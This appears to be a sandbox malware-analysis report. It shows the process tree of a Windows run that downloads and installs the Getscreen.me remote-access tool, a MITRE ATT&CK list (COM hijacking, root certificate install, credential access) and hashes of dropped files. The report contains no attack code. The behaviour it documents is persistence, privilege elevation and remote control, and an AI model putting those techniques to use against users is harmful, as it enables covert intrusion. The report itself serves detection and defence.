    - Loads dropped DLL
    PID:856
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3244,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3780 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4440
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=4416,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3788 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:784
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=3196,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5360 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3712
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=5228,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4540 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - NTFS ADS
    PID:5076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --field-trial-handle=4788,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=4496 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1204
- - C:\Users\Admin\Downloads\getscreen.exe
    "C:\Users\Admin\Downloads\getscreen.exe"
    3⤵
    - Executes dropped EXE
    - NTFS ADS
    PID:2092
  - - C:\Users\Admin\Downloads\getscreen.exe
      "C:\Users\Admin\Downloads\getscreen.exe" -gpipe \\.\pipe\PCommand97Getscreen.me -gui
      4⤵
      Executes dropped EXE
      Modifies Internet Explorer settings
      Suspicious use of SendNotifyMessage
      PID:5084
  - - C:\Users\Admin\Downloads\getscreen.exe
      "C:\Users\Admin\Downloads\getscreen.exe" -cpipe \\.\pipe\PCommand96Getscreen.me -cmem 0000pipe0PCommand96Getscreen0me47t6z9rm37soezs -child
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1972
  - - C:\Users\Admin\Downloads\getscreen.exe
      "C:\Users\Admin\Downloads\getscreen.exe" -install
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      NTFS ADS
      PID:4324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5208,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5784 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5288
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5300,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5792 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3784,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=3172 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5540
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --field-trial-handle=6368,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6344 /prefetch:12
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --field-trial-handle=6364,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6324 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5632
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6504,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6620 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=5052,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5880 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4388
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1000,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5140 /prefetch:10
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:5920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5920,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5908 /prefetch:14
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5180
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5884,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=5940 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4584
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6552,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6124 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5536
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6560,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6216 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6040
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6232,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6304 /prefetch:1
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5136
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5856,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6544 /prefetch:1
    3⤵
    - Executes dropped EXE
    PID:5316
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6652,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6248 /prefetch:1
    3⤵
    - Executes dropped EXE
    PID:4624
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5916,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6616 /prefetch:14
    3⤵
    - Executes dropped EXE
    PID:988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4844,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6204 /prefetch:1
    3⤵
    - Executes dropped EXE
    PID:4548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6724,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6188 /prefetch:14
    3⤵
    - Executes dropped EXE
    PID:5152
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6360,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6256 /prefetch:14
    3⤵
    - Executes dropped EXE
    PID:5168
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6864,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6888 /prefetch:1
    3⤵
    - Executes dropped EXE
    PID:3460
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6800,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6708 /prefetch:1
    3⤵
    PID:5160
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5928,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6156 /prefetch:14
    3⤵
    PID:3812
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6680,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6784 /prefetch:14
    3⤵
    PID:3524
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=7036,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7140 /prefetch:14
    3⤵
    - NTFS ADS
    PID:5508
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=6572,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7136 /prefetch:14
    3⤵
    PID:3608
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=7020,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6720 /prefetch:14
    3⤵
    PID:5184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --field-trial-handle=7144,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7116 /prefetch:14
    3⤵
    PID:1996
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6188,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=6184 /prefetch:14
    3⤵
    PID:2024
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=7112,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7120 /prefetch:9
    3⤵
    PID:3012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=7232,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7248 /prefetch:14
    3⤵
    PID:3932
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=7256,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7276 /prefetch:14
    3⤵
    PID:5480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-dinosaur-easter-egg-alt-images --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=7180,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7184 /prefetch:9
    3⤵
    PID:8132
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6584,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7028 /prefetch:14
    3⤵
    PID:1640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=7016,i,7875398886419146098,16626313894303656934,262144 --variations-seed-version=20240719-130109.258000 --mojo-platform-channel-handle=7556 /prefetch:14
    3⤵
    PID:3408

C:\Program Files\Google\Chrome\Application\126.0.6478.128\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\126.0.6478.128\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:3340

C:\ProgramData\Getscreen.me\dzjqtuxwimtiosjogvbxhxcjqukpbuu-elevate.exe
"C:\ProgramData\Getscreen.me\dzjqtuxwimtiosjogvbxhxcjqukpbuu-elevate.exe" -elevate \\.\pipe\elevateGS512dzjqtuxwimtiosjogvbxhxcjqukpbuu
1⤵
- Executes dropped EXE
PID:220

C:\Program Files\Getscreen.me\getscreen.exe
"C:\Program Files\Getscreen.me\getscreen.exe" -service
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:616
- C:\Program Files\Getscreen.me\getscreen.exe
  "C:\Program Files\Getscreen.me\getscreen.exe" -cpipe \\.\pipe\PCommand96Getscreen.me -cmem 0000pipe0PCommand96Getscreen0me7pdwvmage0httyj -child
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1536
- C:\Program Files\Getscreen.me\getscreen.exe
  "C:\Program Files\Getscreen.me\getscreen.exe" -gpipe \\.\pipe\PCommand99Getscreen.me -guihide
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SendNotifyMessage
  PID:3092
- C:\Program Files\Getscreen.me\getscreen.exe
  "C:\Program Files\Getscreen.me\getscreen.exe" -cpipe \\.\pipe\PCommand96Getscreen.me -cmem 0000pipe0PCommand96Getscreen0mervr63c142c0ee95 -child
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2692
- C:\Program Files\Getscreen.me\getscreen.exe
  "C:\Program Files\Getscreen.me\getscreen.exe" -epipe \\.\pipe\PCommand98phqghumeaylnlfd -environment
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:6120
- C:\Program Files\Getscreen.me\getscreen.exe
  "C:\Program Files\Getscreen.me\getscreen.exe" -cpipe \\.\pipe\PCommand96Getscreen.me -cmem 0000pipe0PCommand96Getscreen0mej1tl1m6gepo86sq -child
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:5984

C:\Program Files\Getscreen.me\getscreen.exe
"C:\Program Files\Getscreen.me\getscreen.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5232

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004C8
1⤵
PID:2280

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --wake --system
1⤵
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
PID:6588
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0xfec694,0xfec6a0,0xfec6ac
  2⤵
  - Drops file in Program Files directory
  PID:6572

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update-internal
1⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:6808
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0xfec694,0xfec6a0,0xfec6ac
  2⤵
  - Drops file in Program Files directory
  PID:6676

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update
1⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:6612
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0xfec694,0xfec6a0,0xfec6ac
  2⤵
  PID:6860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\settings.dat

Filesize
40B

MD5
9974ec2f496860160ed6d9fab66bf313

SHA1
d07d4bb4f427833ec6f6735884cc2e126b556bc1

SHA256
4569be8709672e648ae8409acc5d4ca21afb1e336323d0fa59f9cee297f0d3af

SHA512
39c47b03c7f07c74adcd53ac62e16cd3f230af103016a3d8bc38c5d43eea31ccebc7fbb62683e03339f5abec27a17401a9595684b8b3915a7b9a9bc17fdbe867

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
49B

MD5
7b693a82168c33ec9e8cf276859ddf7f

SHA1
d396dbbe299fe7754a6244d01e97cc4edd0693eb

SHA256
84a9a7f43db56cd6e9a408f88244e8ba5efbe48a5b5168d321f112b8c8fd8e3f

SHA512
4064c158d753d19a72e1be1c8bd5fe7f22e2032d67d1dd7ea1d85ce652d63c69b85a4292c4403b0f7729b05607f3d1ccfaf4d27d04ad09ffcec70082450320ab

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
765B

MD5
5e4c52cdcc3ff56d019bd9fc6db20f65

SHA1
b914196f66f9d4f2636c716657af94cb2b4c9ac0

SHA256
c480214920f7bf6690fda4dab848ccdc1ce4e7150436881715446e0d86f3f719

SHA512
dcdba64ccb23f223b1d58fc8f50d8a75151af0c0624c4bda95a53fb5bf1c3600ec75bc57ad833c135f7c4acd0ae93703b8c200483194d76ec30be2e40db5ef54

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
354B

MD5
b5d1a2243c82ce697f8450cb1f6d2603

SHA1
2d267086bbc4daf7821ea8b19bb6d319d3a8f14c

SHA256
4ff61b9ea4bcccf1de9716d7212bef240214d1bfe7424d3a74f171b25e221169

SHA512
a19e5b51f35a02a5e7c5ceefbf14d56970956478f0e008026e22931bbf363e026795d18dfcafbce74512d5b05347829a3d2fb333aeddec55235844e5452aef51

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
675B

MD5
e5a66bad5a9eccd6be68f24511f0239e

SHA1
a6c1cedf3727a564b4c3bbf8949eaf23dcc532b0

SHA256
01dfd85fed6b684e01e7752524775db9c9c7a530f010611cf88d4fe0cb658c3c

SHA512
f64091d8eba974f04aec9c3931e4e3d37a9e3eef16f31394c0f5d224e16f20589f24bc8910ababa7a37c6fe381c77c33a618ebf29be2aa1bdc349b0137607f6a

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
1KB

MD5
d0eaaddbe4d213602c78d52afe937d97

SHA1
e2349e42cf7c99e330c70b3c3df496debab534e1

SHA256
f0d2f2ad2d71cc2c848c223df7556963242c95fb45010793b0b5418fcbc47149

SHA512
08e1f68d0a393c8aea28cdeeea565e1efc3ee66bb81c67e9e961890964da445c97312ada563ad93455bd26845d516b9158e9a92be8c86789696d0fa16f852391

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
513B

MD5
2ae89c0cb164c6cb3aa714f44e9fb8e0

SHA1
5676036317f4b4a70d41fb79806025706e1faf0b

SHA256
0a2facd6cf35c5e34f0d1756d1573fa5d6c9c0d0f45dd3032ea8502a643b5b18

SHA512
ba9d9eb770beebd87c68e7ecef91751260e335b5f0addbe7f236e4a6405cddb0fbd17b44e360bb709a382899757038bf9a7fe94bf209235549f716e0b419b26b

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\prefs.json

Filesize
613B

MD5
b484f7a647278e6abeaf6d756fe0a98f

SHA1
9104d1355e6a8b252fd4b2ce252c4afbb173605b

SHA256
f366f66e5dd109cec676f0bc603812c61d3988f51b4a2d14b218e1b1311b16a5

SHA512
c159bda714aedca39addb875e00a07efb86b070b9ce9886243175835375cbbcc7afac3484bb6fd35a317e074813fe1c1abcc6f3bfbeae632f5986347959449de

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
1KB

MD5
fa8dacfda1730a1f3351e1450e5085b3

SHA1
88621211f4d7f8358a8bf306b2e99f2aa282af25

SHA256
010fd2d82e3fae4ae066a39f6fc528fe89919fbabe6567b940ba649ee9e55ec3

SHA512
e73af8c01574d215e625f31e3578041f2951f969d30554280e1224acc1a331e31539350dde09e128dec9dab39fa8e1584d52c3f1cf97e578527deb48a6cff1c0

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
2KB

MD5
254be485dd3de7cbe111bf585ce3a650

SHA1
4a5c27580efa34423fdfa6fed81e4c094ab0d30f

SHA256
9f4cbcc7cca5e9fa3b1fc61c4f49cb1574897b6ffbe674be9aa21cd0e35c9abc

SHA512
00040bb4e010e4f866a99b228907a0ea0f45bb160da143fd14aa3ea3af47429fa81f2f04707f57f05fd2291d04b37bc58886a9d72d8119748df94e7c7a9ad4f3

Download Submit
C:\Program Files (x86)\Google\GoogleUpdater\updater.log

Filesize
4KB

MD5
ea2ee023650129ada998c315aaa258c2

SHA1
3c8ee52952f8b86e9987a4fca8c39e67039fd76e

SHA256
3e819131b37c80d21a76002c8c0d8c73594a11c7dcdf260ac524c229e2cd40f7

SHA512
